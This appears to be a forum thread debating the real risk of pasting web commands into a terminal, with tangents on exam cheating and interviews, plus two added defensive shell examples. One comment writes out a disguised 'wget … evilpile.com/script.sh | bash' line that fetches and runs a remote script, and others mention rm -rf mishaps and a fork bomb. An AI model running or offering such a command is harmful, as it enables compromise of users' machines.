
So, ok. Don't copy and paste from a website to a terminal, I get it and I got it the last time that this kind of thing was posted. But if I look around I put so incredibly much trust in total strangers all the time that compared to say ordering a pizza (where the cook could put anything in the food they wanted), driving on the highway (where anybody could swerve any moment if they wanted) and simply walking down the street (where that old lady on the left of me could pull a knife and stab me any time they wanted) that you have to wonder if the downsides weigh up against the upsides of simply trusting the website you get the information from and getting on with your life (besides the fact that it is the browser acting in an unexpected way here, the bit selected does not mirror the visual feedback given to the user, this might even simply qualify as a bug).

What is the actual risk here, how many people have been bitten by this sort of thing and what was the resulting damage? I'm not saying there isn't any risk, clearly there is a possibility for exploitation here so chances are this is an actual risk. But I find it hard to make the case that we should all now start re-typing all the text in how-to's and scripts. It's one thing to run wget | curl, quite another to distrust each and every snippet of code on the web. I don't see much difference compared to say installing Ubuntu from a website whose contents I haven't inspected and that may have been built with a bunch of malicious stuff in it, I did not actually inspect all the source code this machine was built up with and I would be busy for half a lifetime if I did, so I outsourced the trust and verify that trust by looking at some checksum but that's about the extent of it.

Is there anybody that can quantify this risk somehow?

Has anybody been personally burned by this?




Not sure whether this anecdote fits the thread well, but does address "don't copy and paste from a website to, well, anywhere without examining what you just pasted":

I was administering a final exam to a programming class. Exam was done on class computers, so with me in the front of the room most of the time I couldn't actually see what everyone was doing (and given the nature of the class, if you cheated it probably wouldn't really help you anyway).

Grading one student's submission, the wording of most of the "essay" questions seemed ... odd. Nothing objectively wrong, but everyone has their own writing style and his answers weren't, well, his. Scrolling thru one particular answer there were some blank lines after the answer ... and then a URL. The URL contained much of the test question. Checking the unfamiliar site, it was a paid technical-question-answering service, base price for answers $30 and rising depending on depth, quality & speed of answer. Copying-and-pasting the purchased answers added the source URL to the selected text, proving malicious plagiarism on the final exam. I figure he spent at least $300 to fail that exam and get one strike per the school's "three strikes and you're out" policy.


Does your school really have a "three strikes and you're out" policy for plagiarism? It seems like that would almost encourage cheating, up to the point where someone gets their second strike.


He failed the exam. I assume that "three strikes and you're out" means out of the school.

At the schools I went to, I don't think a single plagiarism incident would get a student kicked out. They would fail the assignment or the class.


At my school, it was made very explicit that you'd be immediately expelled for plagiarism (subject to appeal, IIRC, but yes: One strike.)


In a US university I have noticed that some international students (I was one too) took a very liberal attitude towards cheating, I won't name any specific countries (think East though) and noticed students from those countries played fast and loose when it came to cheating. Maybe I am being prejudiced or that particular school had a knack for picking cheaters from some countries but not from others. Anyway just my observation.


My anecdata: I did some work at an Australian university engineering department and there was a cultural disconnect with some of the Chinese students; they did not understand that the university wanted them to figure out problems individually -- supposedly they would get together with the smartest students to figure out the answers, and then share them among themselves.


I went to university both in Spain and Canada, and the approach to cheating is very different. In Spain cheating is pretty much acceptable as long as you don't get caught. And even if you do get caught, usually all that happens is that you fail the exam and you have the option to retake it a month later. I don't know about the rest of Europe.


As it should be. The whole system is underpinned by the assumption that no one can cheat. Everyone knows tons of people cheat, but any university who has a "n-strike" policy for academic dishonesty (aka fraud), is purely in it for the money. To students who busted their asses to graduate legitimately, it's a hard slap in the face.


That's way too hardline, surely some people are wrongly accused or some cases are borderline. This sort of "zero tolerance" nonsense always just ends up removing human judgement and common sense from the equation.

Also the idea that "the system is underpinned by the notion nobody can cheat" is absurd. Cheating is rampant! Even in the ivy leagues. Especially in the ivy leagues! But people still value college degrees.


Cheating is rampant, but that doesn't mean that we all as a society don't still ignore that fact! It's a beautiful display of cognitive dissonance. There's no way to know if someone truly achieved their degree, so you have to test them, which is one of the reasons the degree was valuable. You shouldn't have to test someone if they had certain credentials. They've passed their rigorous training program.

I'm not really a fan of no tolerance policies; I would rather the system be re-evaluated so that credentialing and training are the goals of the system, not pushing as many credit hours through the administration as possible. :)


A system where you fail the exam and three strikes and you're out != ignoring the problem.


I probably have a super skewed view on the matter, but what is the point of expelling someone for cheating? Not everyone learns the same way and not everyone needs the same set of skills/knowledge. I feel like people put way too much value on a degree considering what the real world is like.

So far in my short SW engineering career I haven't used a single thing I "learned" from my B.Sc degree, but what school did was to let me hang around with same-minded people for a few years which encouraged us to work on side projects together which taught us way more than any class.

That being said, I didn't cheat either, but I don't think cheating once is a good grounds for expelling someone.


As your instructor you are asking me to certify, on my professional reputation and honor, that you know the material and can be expected to perform to minimum standards. If you cheat, you are untrustworthy, disrespectful, incompetent, and willing to engage in behavior which can cost a company millions - or even get people killed. He11 yeah I'll want you expelled.


> I probably have super skewed view on the matter, but what is the point of expelling someone for cheating?

Devaluing the degrees of everyone who didn't cheat, both economically and socially.


discourages other people?


I think I know what you're saying. Still I wonder if perhaps the students that worked diligently and honestly gained more in the long run.


I was this kind of student, to the bemusement of people at my year. And I can say we like to tell ourselves that - that by honest learning we somehow gained more. But to be honest, what you do at work is so different than what you learn at university that in retrospect, you may just cheat your way through bullshit exams. If you're an autodidact, it could be even better for you, since you won't waste so much time learning nonsense to pass arbitrary performance bars.

I'm not encouraging cheating here. But I learned that sometimes you have to accept that you hold to some rules just because morality, and you don't need to invent practical reasons to justify it to yourself and others. Sometimes following the rules leaves you worse off, but the world where people follow those rules is better for everyone than the world where they don't, and I want to live in the former.


I feel much the same way. Especially centered around worthless electives classes when I was studying maths. If I was interested in "Movies & Music," I would be reading about it already, and it's completely unrelated to my subject matter.


"Three strikes" would be 3 major offenses like flagrant plagiarism/cheating. I was rather surprised buying answers to a final exam wasn't sufficient for expulsion. Didn't dig into the policy details further.


My school gives undergrads one warning before kicking you out for academic dishonesty. However, we've been repeatedly reminded that graduate students know better and we'll get kicked out for a first instance of plagiarism.


Usually these policies work where the first strike is a zero on the assignment, the second strike is a F in the class, and the third strike is getting expelled from the school.


And I thought it was ridiculous when someone had cut and pasted a page from an Oracle manual in response to a set of pre-screening questions for a hiring round, headers included (for a generic SQL question we expected a one sentence answer to).

At least that guy didn't pay for it - to my knowledge at least (he did cut and paste most of his answers from various places, though, and got many of them wrong, including a word-for-word copy of an answer from a forum where the answer he had quoted was torn to pieces by other commenters right below).


Isn't the first place you would go to the Oracle manual? I use stack overflow all the time these days (documentation pages before that existed), not quite cutting and pasting but close enough.


The thing is, if you came to me and said "I know everything in this book", I'd say "so let's save money and buy the book instead of hiring you."

Interview questions are an opportunity for you to show what you are worth. If you're worth less than a book, it's not a good sign.


The most important skill is to know how to look something up.

No one knows everything; or even a majority of things. How fast you can find an answer is what determines your productivity. Whether it's via a book, a man page, google, stack overflow, or asking the right people doesn't matter.


Shouldn't interviewers be asking about things that wouldn't be answerable in a book?


They should be asking things that are relevant to the job.


See, now you just broke the entire recruitment process.


Yeah, but most of those kinds of questions take a long time to answer.


For a basic SQL question? No. I'd never even seen an Oracle manual prior to that, and I haven't since.

If I needed specifics about Oracle, sure. I don't expect to ever need that.

But the more important aspect was that the full, complete answer to the question we raised took a single, short sentence. It was not clear from the page he had cut and pasted whether or not he even understood the question, so even if he hadn't copied it without telling us the source we'd not have considered it an acceptable answer.


There's a difference. I interviewed one guy who when asked about what a product does, read the introduction to the manual.


> Isn't the first place you would go to the Oracle manual?

If I knew the answer, or had a decent notion of the answer? Hell no.


Keep in mind that if the paste buffer includes a newline, everything preceding that newline will be executed. Pasting into an intermediate buffer, like a text editor, would be advisable.


Ouch. Double fail.


trust but verify ;-)


It's a different threat model to your other examples though. The pizza guy, the driver, the lady down the street, unless they know you and have something against you, they would want to target you with no apparent motive in your examples. There is plenty of motive to hack random computers by just putting up a malicious website. And people try to do it all the time, and install malware with various degrees of stealth. It's not really an unknown or crazy threat.

The website threat model also allows the bad guy to target someone by IP, or some country, or only put the malicious code 1 in 1000 times, so it's not going to be widely noticed, etc.

Or it could be an HTTP (not -S) website and someone MitMs you (OK that is a pretty far-fetched attack vector for someone who MitMs you, I admit).

edit: although I agree with you that I've personally never encountered a case where this specific malicious trick happened


> It's a different threat model to your other examples though. The pizza guy, the driver, the lady down the street, unless they know you and have something against you, they would want to target you with no apparent motive in your examples.

No obvious motive or relationship is needed, especially when mental illness is considered. It could be that some stranger who lives elsewhere is walking down your street and might be looking to mug someone.


> But if I look around I put so incredibly much trust in total strangers all the time that compared to say ordering a pizza (where the cook could put anything in the food they wanted), driving on the highway (where anybody could swerve any moment if they wanted) and simply walking down the street (where that old lady on the left of me could pull a knife and stab me any time they wanted) that you have to wonder if the downsides weigh up against the upsides of simply trusting the website you get the information from and getting on with your life

But in all of the scenarios you just mentioned:

1) It's immediately obvious something's very wrong. (Assuming pizza contains poison.)

2) It's very likely the perpetrator will get caught.

3) No one else is left with control over your resources

Trusting a script from a website to the point where you execute it in your terminal could result in someone controlling a rootkit on your machine, without you ever knowing, with little chance of a savvy perpetrator getting caught, and with all of your operating system tools subsequently lying to you about any information you could use to detect the event.

That said, I've trusted such scripts and "gotten on with my life" on several occasions.


Similarly, running "make" in the directory of a freshly downloaded repo is dangerous too. It's really difficult to check all code running on our behalf and to quantify the risks.

If someone takes control of a popular git repo and pushes a malicious build script, how many people will be affected before the fix?

But this doesn't seem to happen very often too.


I think that's well mitigated by using docker, a VM, or any similar solution.


Good point. It is important to realize that being too obsessive about security is possible, and to know a reasonable point at which to draw the line.

But there is a difference between the two types of attack you describe that seems to change the rules on the web at least somewhat.

The difference is risk to the attacker. If I start punching someone on the bus, getting thrown off is the optimistic outcome. I could reasonably expect to be arrested, or assaulted in return, possibly fatally.

But if I post malware on the web, the worst I could reasonably expect is that the offending content is taken down, my account with that host rescinded, and assuming I do nothing to conceal my identity, I may become known as the type of scumbag who does such things. I grant that much worse results are possible, but it just doesn't seem realistic to expect much worse punishment, so long as a government or large corporation wasn't a serious victim.

Or so it seems to me. Thoughts?


While I agree with you, I also think this line of reasoning is a distraction. If we could prevent people from punching you on the bus by technological means with very little drawback, we would.

It's hard for me to see what is the difference between people who question formalizing best practices in computing and people who disagree with modern car engines and seatbelt laws.

We do these things not because it always makes a difference for one single person all the time but because it makes the system move in the right direction, leading to possibilities we couldn't foresee from the beginning.

Someone who works in "real world" security and always has to weigh the downsides, e.g. the implications for privacy when installing a security camera on a bus, must think we are crazy questioning such low hanging fruit.


This is a great point, and something I often wonder about as well. I think it's reasonable to think that only a compromised site or site run by someone with ill-intent would pose any real risk. And in such a scenario, it's going to get out pretty quickly that the site is compromised/dangerous.

While this doesn't help that theoretical set of initial victims, it just doesn't feel like a credible risk worthy of too much worry, especially for information from higher profile sites with reputable backing.

Perhaps the solution here is better mechanisms for validating what a script can do - "script is attempting to access xyz, allow? y/n".


Little Snitch serves this purpose to some extent on OS X. If the malicious hidden script invoked a remote server I'd get a popup asking if I would like to allow it.


Assuming the script didn't inject malware in a way that allowed traffic bypassing Little Snitch.


> And in such a scenario, it's going to get out pretty quickly that the site is compromised/dangerous.

If a perpetrator is smart, the malicious script is going to be hidden a few invocation layers deep, and will only remain up for short intervals. A naive or stupid perpetrator is going to get caught quickly. But the medium is such that a smart one can hope to evade detection.


Paste into a text buffer first, which is generally a good idea anyway to deal with formatting issues.


I do that regardless because I'm super paranoid about stuff like this but I'm really wondering if I'm not taking it a bit too far. I've also yet to run into any kind of attempt to pull a stunt like this in a very long time of activity so I'm wondering what the actual incidence is.


I generally find it worth it for the simple risk that you may end up breaking stuff without anything malicious on behalf of the site.

E.g. cut and paste a command and get a linebreak in the wrong location and the "rm -rf /var/tmp/foo" turns into "rm -rf /var/". Fun times.

These days I'm more and more often just spinning up temporary containers as well. Not so much for security as to avoid making a mess of my environment with all the stuff I'm testing. So trivial to start out with a "docker run --rm -t -i ubuntu -v /some/suitable/host/dir:/mnt /bin/bash -l" or similar to get a fresh container with a directory I can dump anything I decide I want to keep in.


> docker run --rm -t -i ubuntu -v /some/suitable/host/dir:/mnt /bin/bash -l

So is it safe to cut-and-paste that line there ;) ?

I type very fast but if I see a 100+ character line with a whole bunch of flags and what not the chances of introducing a fatality while re-typing it (was that / var or /var?) are quite large.

And of course anything that involves 'rm' or other nice and friendly commands gets an extra eyeball but at some point you have to decide to pull the trigger or not.


If you know any docker, that line is pretty basic, so you shouldn't copy-paste it, just write it from scratch:

docker run -it --rm -v `pwd`:/mnt ubuntu bash

Also, this one works, the other one doesn't ;)


I do not do that. I have copied and pasted git clone commands directly in my terminals many times. The question is, for those who do it, how often do you notice a malicious command and this saves your day.


I've never encountered a malicious command in the wild, but having the commands I execute saved in a "notes.txt" or a wiki page I keep to document whatever I'm doing at any given time, sure has saved my day more than once. Usually several days after, when I can look back at what I did and replicate, fix or enhance whatever procedure.

So if it also protects me against this, I say doubleplusgood.


"What is the actual risk here, how many people have been bitten by this sort of thing and what was the resulting damage?"

Exactly. And what I essentially typically say is "the scope of the problem has not been defined".

We see this often on news reports on TV as an example. They go off with hyperbole about some issue but fail to address exactly how many people have been affected by it. Simply saying things like "there is a growing concern..." or cherry picking examples.

We see this now with cases of "police brutality" and use of unwarranted force. It's not that it doesn't exist, but that any reports totally ignore how often it actually happens vs. how many times it doesn't happen.


I found it really easy to turn off styles, to show the real code. In firefox the View Menu, Page Style, No Style.

There are ways to assign this to a keypress or button as well.


The QuickJava add-on for Firefox lets you add toolbar button to toggle CSS (and other features) on and off.

https://addons.mozilla.org/en-US/firefox/addon/quickjava/


Thank you, that is very helpful!


I think the message is mostly directed at developers. It's worth noting that a developer's PC is often a very good target. It carries a lot of power, i.e. source codes, host names and private keys, etc. So even the number is small, a targeted attack might have a big impact. And a targeted attack is much, much more difficult to quantify or even study.


Not burned in the sense that I executed some hidden commands in the terminal, but I've tried pasting snippets of text in IRC and ended up pasting several lines of text that absolutely did not select.

While this may not be a huge issue in practice, I have no idea what motivates the inclusion of functionality that manipulates the clipboard in the browser. I don't really think that the analogies of anyone swerving on the highway or someone poisoning your pizza apply. It's more like your seat belts were deliberately removed, or someone put arsenic right next to the pizza box just in case anyone would want to poison you.


Technically, they're not manipulating the clipboard at all. That is definitely disallowed by browsers. What they are doing is extending the selection to an invisible part of the page, so you're copying more than you bargained for.

But without being able to manipulate selections, some nice features of certain sites would be lost. (e.g. the "share" link in StackOverflow automatically selects the URL for you so you only need to press Ctrl-C, instead of having to select it manually.)


> I have no idea what motivates the inclusion of functionality that manipulates the clipboard in the browser.

I'm not sure, but I expect that it's the same sort of thing that motivates the inclusion of the ability to enable page content obfuscation schemes that -say- scramble a page's plaintext, but use CSS styles and JS voodoo to make it appear like the page contains only comprehensible text.

I expect that -when using such a scheme-, you'd need to be able to modify what is being tossed on to the clipboard, as -I expect that- the inbuilt selection tool will pick up your garbage data as well as the intended text. [0]

Edit: To be a little more practical, you could (for instance) use the ability to modify the contents of a clipboard to -say- create custom representations of your web application data formats and allow relatively easy transfer between instances of the software.

[0] Yes, I do recognize that allowing copy and paste kinda defeats the purpose of this scheme, but the scheme is something that I've seen in the wild.


It's not just trust in strangers - it's trust in the strangers and whomever may have infected the stranger with a mind-control parasite.

For web-sites, that includes direct hacks that make the site distribute malware, as well as "malvertising", etc.

So that old lady next to you may actually be the gang of thugs waiting in a dark alley.

But I don't think that the malware distributors are likely to choose an uncommon channel like copy-and-paste as a distribution vector, so you're probably still OK.


Except it's very uncommon to be poisoned or stabbed and very common for IT systems to be hacked, because there's a pretty big incentive to do so (setup a spamming farm, steal data, enlarge a botnet, script kiddie cred, etc).

>Has anybody been personally burned by this?

I imagine a lot of devs who follow bad practices cause a lot of havoc, but it's up to the security and sysadmin team to clean up after them. They may not be fully aware of all their bad practices and a refrain of "Let us be bad, it hasn't caused any problems yet," is short-sighted.

>say installing Ubuntu from a website

At the very least you have an SSL identified site and published checksum hashes on a separate server. That's a far cry from a random shell script. Installing an OS is a special case anyway, so it's not really a good comparison here.

edit: typos


You have 'uncommon' twice, I think you meant 'common' in the second instance.


> Has anybody been personally burned by this?

I've seen a gist posted at bitcointalk (a scammerful place) to do currency conversion in php or js, can't remember. The gist contained hidden code at column 300. Not that I was personally burned, but yea, I've seen it in the wild.
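The two hazards raised in this thread, a newline in the paste buffer (everything before it runs the moment it is pasted, as an earlier comment notes) and code pushed out past column 300 as in the gist above, can both be checked for before text reaches a terminal. The following is an added example, not any commenter's code: a POSIX sh filter that reads the would-be paste on stdin; the 20-blank threshold and the sample inputs are my own choices for illustration.

```shell
#!/bin/sh
# audit_paste: read the text you are about to paste on stdin and report what a
# glance at the rendered page would not show. Findings, in order:
#   newline  - at least one newline is present, so the shell would execute
#              everything before it the instant the text was pasted
#   control  - control characters other than newline and tab (carriage return,
#              escape sequences, backspace) are present
#   padding  - a run of 20 or more blanks, the "code at column 300" trick
# Prints "clean" and returns 0, or "hidden: <findings>" and returns 1.
audit_paste() {
    tmp=$(mktemp)
    cat > "$tmp"
    findings=""
    # wc -l counts newline characters, which is exactly the thing that matters
    if [ "$(( $(wc -l < "$tmp") ))" -gt 0 ]; then
        findings="$findings newline"
    fi
    # Drop the newlines and tabs we tolerate, then look for any other control byte
    if tr -d '\n\t' < "$tmp" | LC_ALL=C grep -q '[[:cntrl:]]'; then
        findings="$findings control"
    fi
    # 20+ consecutive spaces or tabs: text pushed past the visible edge of the page
    if grep -q '[[:blank:]]\{20,\}' "$tmp"; then
        findings="$findings padding"
    fi
    rm -f "$tmp"
    if [ -n "$findings" ]; then
        echo "hidden:$findings"
        return 1
    fi
    echo clean
}

# Demonstration on constructed samples
demo() {
    printf 'ls -la' | audit_paste || true                         # clean
    printf 'ls -la\n' | audit_paste || true                       # hidden: newline
    printf 'ls -la\r# looks like a comment' | audit_paste || true # hidden: control
    # a visible command, 300 blanks, then a second command on the same line
    printf 'ls -la%300secho this was hidden\n' '' | audit_paste || true
}
demo
```

On a desktop the text can be fed straight from the clipboard, e.g. `xclip -o | audit_paste` on X11 or `pbpaste | audit_paste` on macOS.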


The title of this piece should be "check out this cool trick I learned." Then it could have been a quarter the length and wouldn't have had to have been couched with all the motherly scolding.


The same argument applies for the following command.

wget -O - https://example.com/script.sh | bash

If you trust the source, you might as well install it. Otherwise, we're basically arguing that everyone who has ever installed any non-distro software is an idiot.

Consuming http or the connection dying and script ending early and being left in a weird state is probably a more interesting argument than the trust issue.


Well, you can combine the two approaches.

The text on the webpage reads

wget -O - https://example.com/script.sh | bash

but when copied is actually

wget -O - https://evilpile.com/script.sh | bash; echo wget -O - https://example.com/script.sh \| bash

or whatnot.


The connection-closed problem can be solved by wrapping the code in the script within a function, then calling that function at the end of the script. Of course, that needs to be done by the software's author, but we trust the authors of our software if we're going to run it, yes?
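An added example, not from the thread, of the function-wrapping pattern the comment above describes: two constructed installers, one naive and one wrapped, are each run complete and cut off mid-stream the way a dropped connection would cut off a piped download. The installer work is a stand-in (two log lines and a marker file) and the byte offsets are tied to these exact scripts.

```shell
#!/bin/sh
# Naive layout: top-level statements run as soon as the shell has parsed each
# one, so a stream cut between them leaves whatever ran so far in place.
write_naive() {
    cat > "$1" <<'EOF'
#!/bin/sh
set -eu
workdir="$1"
echo "step 1" >> "$workdir/log"
echo "step 2" >> "$workdir/log"
touch "$workdir/installed"
EOF
}

# Wrapped layout: the body is a function and the only top-level statement is
# the final call. A cut inside the function is a parse error before any step
# runs; a cut before the last line leaves a complete function nobody calls.
write_wrapped() {
    cat > "$1" <<'EOF'
#!/bin/sh
set -eu
main() {
    workdir="$1"
    echo "step 1" >> "$workdir/log"
    echo "step 2" >> "$workdir/log"
    touch "$workdir/installed"
}
main "$@"
EOF
}

# outcome SCRIPT BYTES: run SCRIPT (truncated to BYTES, or whole if BYTES is 0)
# in a scratch directory and print installed, partial (some steps ran) or nothing.
outcome() {
    dir=$(mktemp -d)
    if [ "$2" -gt 0 ]; then
        head -c "$2" "$1" > "$dir/script.sh"   # simulate the stream dying here
    else
        cp "$1" "$dir/script.sh"
    fi
    sh "$dir/script.sh" "$dir" 2>/dev/null || true
    if [ -e "$dir/installed" ]; then
        echo installed
    elif [ -e "$dir/log" ]; then
        echo partial
    else
        echo nothing
    fi
    rm -rf "$dir"
}

demo() {
    tmp=$(mktemp -d)
    write_naive "$tmp/naive.sh"       # 122 bytes long
    write_wrapped "$tmp/wrapped.sh"   # 159 bytes long
    # Byte 70 is just after "step 1" in the naive script and in the middle of
    # "step 1" inside the function in the wrapped one; byte 149 is the end of
    # the wrapped function body, before the call to main.
    echo "naive, complete:      $(outcome "$tmp/naive.sh" 0)"
    echo "naive, cut at 70:     $(outcome "$tmp/naive.sh" 70)"
    echo "wrapped, complete:    $(outcome "$tmp/wrapped.sh" 0)"
    echo "wrapped, cut at 70:   $(outcome "$tmp/wrapped.sh" 70)"
    echo "wrapped, cut at 149:  $(outcome "$tmp/wrapped.sh" 149)"
    rm -rf "$tmp"
}
demo
```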


Or even

$ git clone https://github.com/somedev/package .

$ ./install.py


It would make for a good spearphishing attack. If you know the target's stack and can guess what sorts of issues they might run into, you can throw up a few pages detailing fixes for those issues. Give half-right answers on stack and link to your honeypot for "more in-depth discussion of the issue". Then sit back and wait for a dev to run your "fix" on one of their servers.


That's too much work. It would be easier to just tell them to curl | sh and put all your malicious stuff in the script. That way they won't actually see anything malicious on their screen.


That requires more stupidity on the target's part. I think most devs know not to `curl | sh` random scripts, but something as innocuous as `ps -ef | grep /some/longish/annoying/path/to/script` would seem both safe at first glance and long enough to want to avoid typing.


Do you download binaries? Do you build or install projects you've downloaded?

Those have the same risk as curl|sh


With both binaries and curl|sh, trust in the source is a major factor in whether or not you do it. But copying an innocuous-looking terminal command (like `ps | grep`) doesn't seem like it would require trust.

I'll absolutely grab a binary or `curl | sh` from slack.com. I won't do it from a forum. But I would copy a terminal command that didn't look like it was doing anything fishy from a forum.


For a long time I had the bash fork bomb without any further explanation as my signature line on /, I'd just about forgotten about it when I got a really angry email from someone telling me that I'd blown up his server and thanks very much for that.


It's the same level of risk experienced, when dealing with the types of individuals who invariably always download and execute unsafe email attachments, click malicious links in emails, respond to chain letters, business solicitations from Nigerian princes, and so on, and so on, and so on...


> Has anybody been personally burned by this?

People get burned by this sort of thing all the time, malicious downloads were hip when Clinton was in the White House. Yes, only on Windows, and yes, easy to thwart if you know what to look for, but it's disingenuous to say that it's never happened. These things are attacks on your ability to recognize and be vigilant, and you can't recognize and be vigilant of everything at the same time.

Obviously the particular vector of console pastes hasn't been exploited yet but that doesn't mean it won't ever. When it does, we'll mourn the passing of our current free-wheeling days the same way we mourn the old Usenet.


Not sure you will get anything more than anecdotal evidence but the propensity of people I've interviewed to go to a site like Stack Overflow and cut/paste "solutions" into their shell or terminal is sadly quite large. I much prefer people who can internalize the core knowledge of their craft over those who are living with all their technical knowledge currently swapped out to the web.


I think you're wildly underestimating how much "core knowledge" there is in the entire field of computing. You can be an absolute master of several disciplines and still need help when stepping outside that area.

In my experience, this sort of attitude leads to things like people saying "What the hell? Your resume said you knew Linux!" when you fail to know every single quirk of the specific unpopular distro that they're using. Don't be that guy.


If you'd be capable of injecting this sort of trick into stackoverflow that would be news. It's all about the source...

And truth be told, I have used stackoverflow to look up things, even things that I knew before but somehow lost due to inactivity, a lack of RAM refresh so to speak. I'm not ashamed of that and the IT field is now so incredibly broad that I don't feel that I'm the exception there, it's very hard to keep all of the moving parts of a webstack in your head and even harder to keep up when the platforms are changing right underneath you.

And yet I don't feel as if I fall under the 'guy that hasn't internalized the core knowledge of our craft' rule :)


I could never quite get those tar flags right and often have to `man tar`.


That's normal (I think). It's one of those "use every 6 months" commands, once you get away from the usual tar -xzvf flags. (Enough time to know it exists but too long to remember the actual syntax.)


Ditto rsync and the more obscure gcc stuff (though that usually ends up in makefiles rather than be typed in on the command line after trying it the first time).


I think, though I'm not sure I can explain why exactly, there's a difference between using one utility—Google—to answer all questions (with no real understanding of what's the 'right' place to ask), and doing focussed research—even if that focus is as minor as just reading the relevant documentation for the specific question.


At some level google (or ddg or whatever you use) is the new 'man'. Especially since many man pages now simply read:

"The GNU folks, in general, abhor man pages, and create info documents instead. Unfortunately, the info document describing tar is licensed under the GFDL with invariant cover texts, which makes it impossible to include any text from that document in this man page. Most of the text in this document was automatically extracted from the usage text in the source. It may not completely describe all features of the program."


https://xkcd.com/1168/

Had to be done.


I agree; it comes down to trusting your source. I trust, say, github and bitbucket, and will gladly copy-paste their commands into my terminal. I'm already trusting them with much more.


Anytime I copy anything from the web, I always paste it in Sublime. Then I would read the text and copy and paste again elsewhere as necessary.

Just me.


I love the pragmatic way you view stuff Jaques, it really shows experience and a lack of vulnerability to hype to me.


Whereas I kinda assume the NSA is already using it, and that's one of the big reasons to care.


I would hope that with all the resources they command that the NSA would not resort to methods involving such co-operation by their intended victims. Though anything goes I guess and why bother doing something intricate certain if something dumb and chancy works just as well.


They frequently use methods where you have to double-click on an email attachment. Most people consider cut-and-paste from a web site to be safer than that.

Also, non-TLS web sites can potentially be hijacked in flight, so this could happen even if the site in question wasn't directly cooperating.



